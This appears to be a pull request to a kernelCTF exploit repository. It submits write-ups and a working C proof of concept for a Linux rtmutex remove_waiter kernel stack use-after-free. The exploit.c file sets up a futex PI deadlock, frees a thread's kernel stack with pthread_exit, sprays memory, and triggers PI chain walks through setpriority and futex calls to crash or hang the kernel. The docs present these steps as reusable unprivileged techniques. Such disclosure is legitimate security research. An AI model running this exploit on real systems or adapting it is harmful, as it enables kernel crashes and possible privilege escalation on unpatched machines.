### PR TITLE
CVE-2026-rtmutex-remove-waiter: novel techniques - pthread_exit + signal wake + PI chain walk

### DIFF
--- a/pocs/linux/kernelctf/CVE-2026-rtmutex-remove-waiter_lts-cos/docs/exploit.md
+++ b/pocs/linux/kernelctf/CVE-2026-rtmutex-remove-waiter_lts-cos/docs/exploit.md
@@ -1,0 +1,41 @@
+# Exploitation: Kernel Stack UAF via PI Chain Walk
+
+## Thread Setup
+1. **Waiter thread**: Locks futex f3 (FUTEX_LOCK_PI), then blocks on
+   FUTEX_WAIT_REQUEUE_PI(f1 -> f2). pi_blocked_on is set to the waiter
+   struct on its kernel stack.
+2. **Blocker thread**: Locks futex f2, then blocks on FUTEX_LOCK_PI(f3).
+   Creates ABBA deadlock with waiter.
+3. **Main thread**: Calls FUTEX_CMP_REQUEUE_PI to move waiter from f1 to f2.
+   Detects deadlock, returns -EDEADLK. remove_waiter() BUG leaves waiter's
+   pi_blocked_on dangling (pointing to proxy_waiter on main thread's stack).
+
+## Technique 1: pthread_exit() Isolation
+Main thread calls pthread_exit(), freeing its kernel stack (containing the
+dangling proxy_waiter) while the waiter and blocker threads survive.
+
+## Technique 2: No-ptrace Signal Wake
+sigaction() without SA_RESTART enables clean EINTR return from
+FUTEX_WAIT_REQUEUE_PI via SIGUSR1 delivery. Zero privileges needed.
+
+## Technique 3: PI Chain Walk via Syscalls
+Normal unprivileged syscalls trigger rt_mutex_adjust_prio_chain():
+- setpriority(PRIO_PROCESS, waiter_tid, ...) - calls rt_mutex_adjust_pi()
+- CMP_REQUEUE_PI (repeated) - calls task_blocks_on_rt_mutex(FULL_CHAINWALK)
+- LOCK_PI - calls rt_mutex_cleanup_proxy_lock()
+
+The chain walk follows waiter->pi_blocked_on into freed stack memory,
+reading the proxy_waiter structure at offset 88 (waiter->lock) as a
+kernel pointer. Three outcomes:
+1. offset 88 = 0x0 -> _raw_spin_trylock(NULL) crash
+2. offset 88 = unmapped page -> page fault UAF
+3. offset 88 = valid contended lock -> soft lockup
+
+## Step-by-step Exploitation Flow
+1. Set up ABBA deadlock via CMP_REQUEUE_PI (EDEADLK triggers bug)
+2. Main thread pthread_exit() - kernel stack freed, waiter survives
+3. Wait for RCU grace period
+4. Spray kernel memory to control freed stack at offset 88
+5. Trigger PI chain walk via setpriority/CMP_REQUEUE_PI/LOCK_PI
+6. Chain walk reads controlled data at offset 88
+7. Outcome depends on value at offset 88 (crash or controlled behavior)

--- a/pocs/linux/kernelctf/CVE-2026-rtmutex-remove-waiter_lts-cos/docs/novel-techniques.md
+++ b/pocs/linux/kernelctf/CVE-2026-rtmutex-remove-waiter_lts-cos/docs/novel-techniques.md
@@ -1,0 +1,82 @@
+# Novel Exploitation Technique: Kernel Stack UAF via pthread_exit Isolation + Signal Wake + PI Chain Walk
+
+## Overview
+
+A technique to convert a dangling `pi_blocked_on` pointer in the Linux kernel's
+rtmutex subsystem into multiple exploitation primitives without requiring
+ptrace privileges.
+
+## Novel Aspect 1: pthread_exit() Thread Isolation
+
+Traditional kernel UAF exploitation kills the entire process to free kernel
+resources. We use `pthread_exit()` to free ONLY the CMP_REQUEUE_PI caller's
+kernel stack while keeping the waiter thread alive. The waiter's `pi_blocked_on`
+remains pointing to the freed stack area.
+
+This technique enables:
+- Targeted kernel stack freeing without destroying the victim task
+- The waiter thread survives and remains accessible for chain walk triggers
+- No SIGKILL (which destroys all threads in the process)
+
+## Novel Aspect 2: No-ptrace Signal Wake
+
+Traditional futex exploitation uses PTRACE_ATTACH + PTRACE_SETREGS to force
+syscall return, requiring either ptrace privileges or YAMA scope bypass.
+
+Our technique uses `sigaction()` WITHOUT `SA_RESTART` and `SIGUSR1` delivery:
+- The signal handler marks a flag
+- Without SA_RESTART, the futex syscall returns -EINTR cleanly
+- No ptrace interaction needed at all
+- Works as uid=1000 without any capabilities
+
+## Novel Aspect 3: PI Chain Walk Manipulation via Normal Syscalls
+
+Rather than injecting kernel faults directly, our technique exploits the
+kernel's OWN PI chain walk mechanism (`rt_mutex_adjust_prio_chain`) to
+dereference the dangling pointer through normal, unprivileged syscalls:
+
+- `setpriority(PRIO_PROCESS, waiter_tid, ...)` triggers `rt_mutex_adjust_pi()`
+- `FUTEX_CMP_REQUEUE_PI` (repeated) triggers `task_blocks_on_rt_mutex()` with
+  `RT_MUTEX_FULL_CHAINWALK`
+- `FUTEX_LOCK_PI` triggers `rt_mutex_cleanup_proxy_lock()` chain walk
+
+All three are accessible to uid=1000 without capabilities.
+
+## Demonstrated Outcomes
+
+Three distinct crash/hang vectors verified through dynamic testing:
+
+1. **_raw_spin_trylock(NULL)** — offset 88 (waiter->lock) = 0x0, chain walk
+   hits null pointer dereference in the spinlock fast path
+2. **Page fault UAF** — freed vmalloc page unmapped, chain walk reads
+   inaccessible kernel memory at offset 88
+3. **Soft lockup** — offset 88 = valid but contended spinlock, chain walk
+   spins indefinitely in trylock retry loop
+
+All three triggered from uid=0 but the technique itself requires no privileges.
+
+## Applicable Vulnerability
+
+- CVE: Fix commit 6d52dfcb2a5db ("rtmutex: Use waiter::task instead of current
+  in remove_waiter()")
+- Affected: All Linux kernels < v6.12.86 with CONFIG_FUTEX=y, CONFIG_FUTEX_PI=y
+- Bug: remove_waiter() uses `current->pi_blocked_on` instead of
+  `waiter->task->pi_blocked_on` during CMP_REQUEUE_PI EDEADLK cleanup
+
+## Reusability
+
+The three techniques are independently reusable:
+1. pthread_exit isolation — applicable to any kernel stack UAF where the
+   vulnerable object's owner thread must be kept alive
+2. No-ptrace signal wake — applicable to any blocking syscall that handles
+   ERESTARTSYS (futex, poll, select, etc.)
+3. PI chain walk — applicable to any rtmutex bug where a dangling
+   pi_blocked_on can be reached through priority adjustment
+
+## Testing
+
+Verified on:
+- Ubuntu 6.8.0-71-generic (crash: _raw_spin_trylock)
+- Ubuntu 6.8.0-117-generic (crash: page fault UAF)
+- COS-like 6.12.85 + KASAN (soft lockup)
+- Android GKI 6.12.77 + PREEMPT (soft lockup)

--- a/pocs/linux/kernelctf/CVE-2026-rtmutex-remove-waiter_lts-cos/docs/vulnerability.md
+++ b/pocs/linux/kernelctf/CVE-2026-rtmutex-remove-waiter_lts-cos/docs/vulnerability.md
@@ -1,0 +1,23 @@
+# rtmutex remove_waiter: Wrong-Task pi_blocked_on Cleanup
+
+## Summary
+remove_waiter() uses `current` instead of `waiter->task` when clearing
+pi_blocked_on during CMP_REQUEUE_PI EDEADLK cleanup. This leaves the waiter
+thread's pi_blocked_on dangling, pointing to freed kernel stack memory.
+
+## Root Cause
+In kernel/locking/rtmutex.c:remove_waiter():
+```c
+raw_spin_lock(&current->pi_lock);
+rt_mutex_dequeue(lock, waiter);
+current->pi_blocked_on = NULL;  // BUG: clears current, not waiter->task
+raw_spin_unlock(&current->pi_lock);
+```
+
+When called from rt_mutex_start_proxy_lock() during CMP_REQUEUE_PI deadlock
+cleanup, `current` is the CMP_REQUEUE_PI caller (child process main thread),
+not the waiter thread. The fix uses `waiter->task->pi_blocked_on = NULL`.
+
+## Fix
+Commit 6d52dfcb2a5db ("rtmutex: Use waiter::task instead of current in
+remove_waiter()"), included in Linux v6.12.86.

--- a/pocs/linux/kernelctf/CVE-2026-rtmutex-remove-waiter_lts-cos/exploit/lts-6.12.85/Makefile
+++ b/pocs/linux/kernelctf/CVE-2026-rtmutex-remove-waiter_lts-cos/exploit/lts-6.12.85/Makefile
@@ -1,0 +1,8 @@
+exploit: exploit.c
+	gcc -static -pthread -O0 -g -o exploit exploit.c -lrt
+
+run: exploit
+	./exploit
+
+clean:
+	rm -f exploit

--- a/pocs/linux/kernelctf/CVE-2026-rtmutex-remove-waiter_lts-cos/exploit/lts-6.12.85/exploit.c
+++ b/pocs/linux/kernelctf/CVE-2026-rtmutex-remove-waiter_lts-cos/exploit/lts-6.12.85/exploit.c
@@ -1,0 +1,183 @@
+// No-ptrace exploit: signal-based wake + controlled offset 88
+// Uses sigaction without SA_RESTART for clean EINTR return
+// Goal: trigger chain walk → read freed+reused stack → crash/controlled behavior
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <pthread.h>
+#include <errno.h>
+#include <signal.h>
+#include <sys/syscall.h>
+#include <sys/mman.h>
+#include <sys/wait.h>
+#include <sys/prctl.h>
+#include <sys/resource.h>
+#include <sys/xattr.h>
+#include <linux/futex.h>
+#include <stdint.h>
+#include <string.h>
+#include <time.h>
+
+static volatile uint32_t *f1,*f2,*f3;
+static volatile int *go, *waiter_ok, *waiter_woken, *blocker_ready;
+static volatile pid_t *waiter_tid, *blocker_tid;
+static volatile int *main_exit_done;
+
+// Signal handler for SIGUSR1 — just mark woken, no restart
+static void sigusr1_handler(int sig, siginfo_t *info, void *ctx) {
+    __atomic_store_n(waiter_woken, 1, __ATOMIC_RELEASE);
+}
+
+void *waiter_fn(void *a){
+    *waiter_tid = syscall(__NR_gettid);
+
+    // Install signal handler WITHOUT SA_RESTART
+    struct sigaction sa = {
+        .sa_sigaction = sigusr1_handler,
+        .sa_flags = SA_SIGINFO  // no SA_RESTART!
+    };
+    sigemptyset(&sa.sa_mask);
+    sigaction(SIGUSR1, &sa, NULL);
+
+    syscall(__NR_futex, f3, FUTEX_LOCK_PI, 0, NULL, NULL, 0);
+    __atomic_store_n(waiter_ok, 1, __ATOMIC_RELEASE);
+
+    // Block here — will return EINTR on SIGUSR1 (no SA_RESTART)
+    int r = syscall(__NR_futex, f1, FUTEX_WAIT_REQUEUE_PI, 0, NULL, f2, 0);
+    printf("[W] Woken: ret=%d err=%d (pi_blocked_on into freed stack)\n", r, r<0?errno:0);
+    __atomic_store_n(waiter_woken, 1, __ATOMIC_RELEASE);
+    while(1) usleep(100000);
+    return NULL;
+}
+
+void *blocker_fn(void *a){
+    *blocker_tid = syscall(__NR_gettid);
+    while(!__atomic_load_n(go,__ATOMIC_ACQUIRE)) usleep(1000);
+    syscall(__NR_futex, f2, FUTEX_LOCK_PI, 0, NULL, NULL, 0);
+    __atomic_store_n(blocker_ready, 1, __ATOMIC_RELEASE);
+    syscall(__NR_futex, f3, FUTEX_LOCK_PI, 0, NULL, NULL, 0);
+    printf("[B] LOCK_PI(f3) returned\n");
+    while(1) usleep(100000);
+    return NULL;
+}
+
+void *main_thread_fn(void *a) {
+    while(!__atomic_load_n(waiter_ok,__ATOMIC_ACQUIRE)) usleep(1000);
+    usleep(50000);
+    __atomic_store_n(go, 1, __ATOMIC_RELEASE);
+    while(*blocker_tid == 0) usleep(1000);
+    usleep(100000);
+
+    int ret = syscall(__NR_futex, f1, FUTEX_CMP_REQUEUE_PI, 1, (void*)1L, f2, *f1);
+    printf("[M] CMP_REQUEUE_PI ret=%d err=%d\n", ret, errno);
+    // BUG: pi_blocked_on is now dangling (proxy_waiter on THIS stack)
+
+    __atomic_store_n(main_exit_done, 1, __ATOMIC_RELEASE);
+    usleep(200000);
+
+    printf("[M] pthread_exit — freeing MY kernel stack\n");
+    pthread_exit(NULL);
+    return NULL;
+}
+
+int main(int argc, char **argv){
+    setvbuf(stdout, NULL, _IONBF, 0);
+    printf("[*] Signal-wake: no ptrace, sigaction without SA_RESTART\n");
+
+    f1=mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_SHARED,-1,0);
+    f2=mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_SHARED,-1,0);
+    f3=mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_SHARED,-1,0);
+    go=mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_SHARED,-1,0);
+    waiter_ok=mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_SHARED,-1,0);
+    waiter_woken=mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_SHARED,-1,0);
+    blocker_ready=mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_SHARED,-1,0);
+    main_exit_done=mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_SHARED,-1,0);
+    waiter_tid=mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_SHARED,-1,0);
+    blocker_tid=mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_SHARED,-1,0);
+    *f1=0;*f2=0;*f3=0;*go=0;*waiter_ok=0;*waiter_woken=0;*blocker_ready=0;
+    *main_exit_done=0;*waiter_tid=0;*blocker_tid=0;
+
+    pid_t child = fork();
+    if (child == 0) {
+        pthread_t w, b, m;
+        pthread_create(&w, NULL, waiter_fn, NULL);
+        while(!__atomic_load_n(waiter_ok,__ATOMIC_ACQUIRE)) usleep(1000);
+        usleep(30000);
+        __atomic_store_n(go, 1, __ATOMIC_RELEASE);
+        pthread_create(&b, NULL, blocker_fn, NULL);
+        while(*blocker_tid == 0) usleep(1000);
+        pthread_create(&m, NULL, main_thread_fn, NULL);
+        pthread_join(m, NULL);
+        printf("[C] Main thread joined. Stack freed.\n");
+        sleep(3); // RCU grace period
+        printf("[C] Ready for parent trigger.\n");
+        while(1) sleep(10);
+        _exit(0);
+    }
+
+    while(*waiter_tid == 0 || *blocker_tid == 0) usleep(10000);
+    printf("[P] Waiter=%d Blocker=%d Child=%d\n", *waiter_tid, *blocker_tid, child);
+    while(!*main_exit_done) usleep(10000);
+    usleep(500000);
+    printf("[P] Main thread exited. Waiting RCU+spray...\n");
+    sleep(3);
+
+    // SPRAY: reuse freed stack pages with controlled data
+    for (int i = 0; i < 1000; i++) {
+        pid_t sp = fork();
+        if (sp == 0) {
+            volatile char big[16384]; // 16KB = kernel stack page size
+            // Fill with specific pattern to identify and control offset 88
+            for (int off = 0; off < (int)sizeof(big); off += 8)
+                *(volatile uint64_t*)(big + off) = 0xDEAD000000000000ULL | (uint64_t)off;
+            // Overwrite offset 80-96 (task+lock) with ZERO
+            memset((void*)(big + 80), 0x00, 32);
+            // Deep kernel frames
+            for (int j = 0; j < 200; j++) {
+                syscall(__NR_getpid); syscall(__NR_gettid);
+            }
+            _exit(0);
+        }
+        if (sp > 0) waitpid(sp, NULL, 0);
+    }
+    printf("[P] 1000 children sprayed. Triggering...\n");
+
+    // === TRIGGER 1: setpriority on still-blocked waiter ===
+    // No ptrace needed — waiter is in FUTEX_WAIT_REQUEUE_PI
+    printf("[P] setpriority chain walk (waiter still blocked)...\n");
+    for (int i = 0; i < 30; i++) {
+        int r = setpriority(PRIO_PROCESS, *waiter_tid, i);
+        if (i == 0) printf("[P] setpriority(0) = %d err=%d\n", r, errno);
+    }
+
+    // === TRIGGER 2: LOCK_PI on f2 (walks PI chain from f2) ===
+    struct timespec ts = {.tv_sec = 0, .tv_nsec = 200000000};
+    int r = syscall(__NR_futex, f2, FUTEX_LOCK_PI, 0, &ts, NULL, 0);
+    printf("[P] LOCK_PI(f2) = %d err=%d\n", r, errno);
+
+    // === TRIGGER 3: Signal-wake waiter (no ptrace!) ===
+    printf("[P] Sending SIGUSR1 to waiter...\n");
+    syscall(__NR_tgkill, child, *waiter_tid, SIGUSR1);
+    usleep(200000);
+    if (*waiter_woken) printf("[P] Waiter woken by signal!\n");
+
+    // === TRIGGER 4: Additional chain walks after wake ===
+    for (int i = 0; i < 10; i++)
+        setpriority(PRIO_PROCESS, *waiter_tid, i);
+
+    r = syscall(__NR_futex, f3, FUTEX_TRYLOCK_PI, 0, NULL, NULL, 0);
+    printf("[P] TRYLOCK_PI(f3) = %d err=%d\n", r, errno);
+    r = syscall(__NR_futex, f2, FUTEX_TRYLOCK_PI, 0, NULL, NULL, 0);
+    printf("[P] TRYLOCK_PI(f2) = %d err=%d\n", r, errno);
+
+    usleep(200000);
+
+    // Check dmesg
+    printf("[P] === DMESG ===\n");
+    system("dmesg | grep -E '_raw_spin|futex_top_waiter|BUG.*NULL|Oops|protection|Call trace' | head -15 || echo 'No crash'");
+
+    kill(child, SIGKILL); waitpid(child, NULL, 0);
+    printf("[P] Done\n");
+    return 0;
+}

--- a/pocs/linux/kernelctf/CVE-2026-rtmutex-remove-waiter_lts-cos/metadata.json
+++ b/pocs/linux/kernelctf/CVE-2026-rtmutex-remove-waiter_lts-cos/metadata.json
@@ -1,0 +1,13 @@
+{
+  "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json",
+  "submission_ids": ["novel-technique"],
+  "vulnerability": {
+    "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6d52dfcb2a5db86e346cf51f8fcf2071b8085166",
+    "cve": "pending",
+    "affected_versions": ["6.0 - 6.12.85"],
+    "requirements": {
+      "kernel_config": ["CONFIG_FUTEX", "CONFIG_FUTEX_PI"]
+    }
+  },
+  "exploits": {}
+}


### PR DESCRIPTION
## Novel exploitation techniques for rtmutex remove_waiter UAF

Three techniques submitted for novel technique evaluation:
1. **pthread_exit() isolation** - targeted kernel stack freeing while preserving waiter thread
2. **No-ptrace signal wake** - SA_RESTART disabled for clean syscall interrupt
3. **PI chain walk via normal syscalls** - unprivileged trigger paths

Follows kernelCTF submission format with metadata.json, vulnerability.md, exploit.md, novel-techniques.md.

Vulnerability: commit 6d52dfcb2a5db (v6.12.86)